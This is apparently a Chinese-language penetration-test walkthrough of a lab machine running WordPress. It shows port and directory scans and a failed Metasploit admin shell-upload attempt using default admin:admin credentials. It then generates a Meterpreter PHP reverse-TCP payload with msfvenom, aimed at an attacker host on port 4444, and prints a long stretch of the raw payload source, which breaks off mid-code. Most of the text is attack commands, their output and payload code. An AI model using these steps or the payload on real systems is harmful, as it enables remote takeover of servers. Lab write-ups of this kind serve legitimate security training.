1、信息收集
1.1、端口扫描
使用
netdiscor
或arp
获取到靶机 ip:192.168.57.137使用
nmap
获取端口信息
kali@kali:~$ sudo nmap -sSV -T4 -p 1-65535 -Pn -n 192.168.57.137
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-23 12:41 CST
Nmap scan report for 192.168.57.137
Host is up (0.0012s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:0C:29:F8:60:F0 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.88 seconds
根据获取到的端口信息,通常openssh较难利用,其次是软件版本的漏洞,优先考虑web应用
1.2、目录扫描
使用
gobuster
对 80 端口进行目录扫描
kali@kali:~$ gobuster dir -u http://192.168.57.137 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.57.137
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/12/23 12:44:57 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/javascript (Status: 301)
/LICENSE (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/upload (Status: 301)
/wordpress (Status: 301)
===============================================================
2020/12/23 12:45:00 Finished
===============================================================
发现存在WordPress应用
2、尝试利用
发现WordPress应用为默认用户名密码,尝试使用
msf
文件上传模块
kali@kali:~$ msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v6.0.16-dev ]
+ -- --=[ 2074 exploits - 1124 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Open an interactive Ruby terminal with irb
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts 192.168.57.137
rhosts => 192.168.57.137
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /wordpress/
targeturi => /wordpress/
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 192.168.57.200
lhost => 192.168.57.200
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username admin
username => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password admin
password => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.57.200:4444
[*] Authenticating with WordPress using admin:admin...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
[*] Exploit completed, but no session was created.
无法成功利用,尝试在界面上写入shellcode反弹shell
2.1、生成恶意payload
通过
msfvenom
生成攻击载荷,由于无法生成php格式的文件,直接将载荷原样输出到界面上此处的payload需要与监听端口使用的payload相同
kali@kali:~$ msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.57.200 lport=4444 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 34281 bytes
/*<?php /**/ if (!isset($GLOBALS['channels'])) {
$GLOBALS['channels'] = array(); } if (!isset($GLOBALS['channel_process_map'])) {
$GLOBALS['channel_process_map'] = array(); } if (!isset($GLOBALS['resource_type_map'])) {
$GLOBALS['resource_type_map'] = array(); } if (!isset($GLOBALS['udp_host_map'])) {
$GLOBALS['udp_host_map'] = array(); } if (!isset($GLOBALS['readers'])) {
$GLOBALS['readers'] = array(); } if (!isset($GLOBALS['id2f'])) {
$GLOBALS['id2f'] = array(); } function register_command($c, $i) {
global $id2f; if (! in_array($i, $id2f)) {
$id2f[$i] = $c; } } function my_print($str) {
} my_print("Evaling main meterpreter stage"); function dump_array($arr, $name=null) {
if (is_null($name)) {
$name = "Array"; } my_print(sprintf("$name (%s)", count($arr))); foreach ($arr as $key => $val) {
if (is_array($val)) {
dump_array($val, "{
$name}[{
$key}]"); } else {
my_print(sprintf(" $key ($val)")); } } } function dump_readers() {
global $readers; dump_array($readers, 'Readers'); } function dump_resource_map() {
global $resource_type_map; dump_array($resource_type_map, 'Resource map'); } function dump_channels($extra="") {
global $channels; dump_array($channels, 'Channels '.$extra); } if (!function_exists("file_get_contents")) {
function file_get_contents($file) {
$f = @fopen($file,"rb"); $contents = false; if ($f) {
do {
$contents .= fgets($f); } while (!feof($f)); } fclose($f); return $contents; } } if (!function_exists('socket_set_option')) {
function socket_set_option($sock, $type, $opt, $value) {
socket_setopt($sock, $type, $opt, $value); } } define("PAYLOAD_UUID", "\x98\x74\xec\x0f\x1b\xba\x3c\xd9\x4c\xaf\x5f\xa0\x13\x4d\x81\x6c"); define("SESSION_GUID", "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"); define("AES_256_CBC", 'aes-256-cbc'); define("ENC_NONE", 0); define("ENC_AES256", 1); define("PACKET_TYPE_REQUEST", 0); define("PACKET_TYPE_RESPONSE", 1); define("PACKET_TYPE_PLAIN_REQUEST", 10); define("PACKET_TYPE_PLAIN_RESPONSE", 11); define("ERROR_SUCCESS", 0); define("ERROR_FAILURE", 1); define("CHANNEL_CLASS_BUFFERED", 0); define("CHANNEL_CLASS_STREAM", 1); define("CHANNEL_CLASS_DATAGRAM", 2); define("CHANNEL_CLASS_POOL", 3); define("TLV_META_TYPE_NONE", ( 0 )); define("TLV_META_TYPE_STRING", (1 << 16)); define("TLV_META_TYPE_UINT", (1 << 17)); define("TLV_META_TYPE_RAW", (1 << 18)); define("TLV_META_TYPE_BOOL", (1 << 19)); define("TLV_META_TYPE_QWORD", (1 << 20)); define("TLV_META_TYPE_COMPRESSED", (1 << 29)); define("TLV_META_TYPE_GROUP", (1 << 30)); define("TLV_META_TYPE_COMPLEX", (1 << 31)); define("TLV_META_TYPE_MASK", (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)); define("TLV_RESERVED", 0); define("TLV_EXTENSIONS", 20000); define("TLV_USER", 40000); define("TLV_TEMP", 60000); define("TLV_TYPE_ANY", TLV_META_TYPE_NONE | 0); define("TLV_TYPE_COMMAND_ID", TLV_META_TYPE_UINT | 1); define("TLV_TYPE_REQUEST_ID", TLV_META_TYPE_STRING | 2); define("TLV_TYPE_EXCEPTION", TLV_META_TYPE_GROUP | 3); define("TLV_TYPE_RESULT", TLV_META_TYPE_UINT | 4); define("TLV_TYPE_STRING", TLV_META_TYPE_STRING | 10); define("TLV_TYPE_UINT", TLV_META_TYPE_UINT | 11); define("TLV_TYPE_BOOL", TLV_META_TYPE_BOOL | 12); define("TLV_TYPE_LENGTH", TLV_META_TYPE_UINT | 25); define("TLV_TYPE_DATA", TLV_META_TYPE_RAW | 26); define("TLV_TYPE_FLAGS", TLV_META_TYPE_UINT | 27); define("TLV_TYPE_CHANNEL_ID", TLV_META_TYPE_UINT | 50); define("TLV_TYPE_CHANNEL_TYPE", TLV_META_TYPE_STRING | 51); define("TLV_TYPE_CHANNEL_DATA", TLV_META_TYPE_RAW | 52); define("TLV_TYPE_CHANNEL_DATA_GROUP", TLV_META_TYPE_GROUP | 53); define("TLV_TYPE_CHANNEL_CLASS", TLV_META_TYPE_UINT | 54); define("TLV_TYPE_SEEK_WHENCE", TLV_META_TYPE_UINT | 70); define("TLV_TYPE_SEEK_OFFSET", TLV_META_TYPE_UINT | 71); define("TLV_TYPE_SEEK_POS", TLV_META_TYPE_UINT | 72); define("TLV_TYPE_EXCEPTION_CODE", TLV_META_TYPE_UINT | 300); define("TLV_TYPE_EXCEPTION_STRING", TLV_META_TYPE_STRING | 301); define("TLV_TYPE_LIBRARY_PATH", TLV_META_TYPE_STRING | 400); define("TLV_TYPE_TARGET_PATH", TLV_META_TYPE_STRING | 401); define("TLV_TYPE_MACHINE_ID", TLV_META_TYPE_STRING | 460); define("TLV_TYPE_UUID", TLV_META_TYPE_RAW | 461); define("TLV_TYPE_SESSION_GUID", TLV_META_TYPE_RAW | 462); define("TLV_TYPE_RSA_PUB_KEY", TLV_META_TYPE_RAW | 550); define("TLV_TYPE_SYM_KEY_TYPE", TLV_META_TYPE_UINT | 551); define("TLV_TYPE_SYM_KEY", TLV_META_TYPE_RAW | 552); define("TLV_TYPE_ENC_SYM_KEY", TLV_META_TYPE_RAW | 553); define('EXTENSION_ID_CORE', 0); define('COMMAND_ID_CORE_CHANNEL_CLOSE', 1); define('COMMAND_ID_CORE_CHANNEL_EOF', 2); define('COMMAND_ID_CORE_CHANNEL_INTERACT', 3); define('COMMAND_ID_CORE_CHANNEL_OPEN', 4); define('COMMAND_ID_CORE_CHANNEL_READ', 5); define('COMMAND_ID_CORE_CHANNEL_SEEK', 6); define('COMMAND_ID_CORE_CHANNEL_TELL', 7); define('COMMAND_ID_CORE_CHANNEL_WRITE', 8); define('COMMAND_ID_CORE_CONSOLE_WRITE', 9); define('COMMAND_ID_CORE_ENUMEXTCMD', 10); define('COMMAND_ID_CORE_GET_SESSION_GUID', 11); define('COMMAND_ID_CORE_LOADLIB', 12); define('COMMAND_ID_CORE_MACHINE_ID', 13); define('COMMAND_ID_CORE_MIGRATE', 14); define('COMMAND_ID_CORE_NATIVE_ARCH', 15); define('COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION', 16); define('COMMAND_ID_CORE_PATCH_URL', 17); define('COMMAND_ID_CORE_PIVOT_ADD', 18); define('COMMAND_ID_CORE_PIVOT_REMOVE', 19); define('COMMAND_ID_CORE_PIVOT_SESSION_DIED', 20); define('COMMAND_ID_CORE_SET_SESSION_GUID', 21); define('COMMAND_ID_CORE_SET_UUID', 22); define('COMMAND_ID_CORE_SHUTDOWN', 23); define('COMMAND_ID_CORE_TRANSPORT_ADD', 24); define('COMMAND_ID_CORE_TRANSPORT_CHANGE', 25); define('COMMAND_ID_CORE_TRANSPORT_GETCERTHASH', 26); define('COMMAND_ID_CORE_TRANSPORT_LIST', 27); define('COMMAND_ID_CORE_TRANSPORT_NEXT', 28); define('COMMAND_ID_CORE_TRANSPORT_PREV', 29); define('COMMAND_ID_CORE_TRANSPORT_REMOVE', 30); define('COMMAND_ID_CORE_TRANSPORT_SETCERTHASH', 31); define('COMMAND_ID_CORE_TRANSPORT_SET_TIMEOUTS', 32); define('COMMAND_ID_CORE_TRANSPORT_SLEEP', 33); function my_cmd($cmd) {
return shell_exec($cmd); } function is_windows() {
return (strtoupper(substr(PHP_OS,0,3)) == "WIN"); } if (!function_exists('core_channel_open')) {
register_command('core_channel_open', COMMAND_ID_CORE_CHANNEL_OPEN); function core_channel_open($req, &$pkt) {
$type_tlv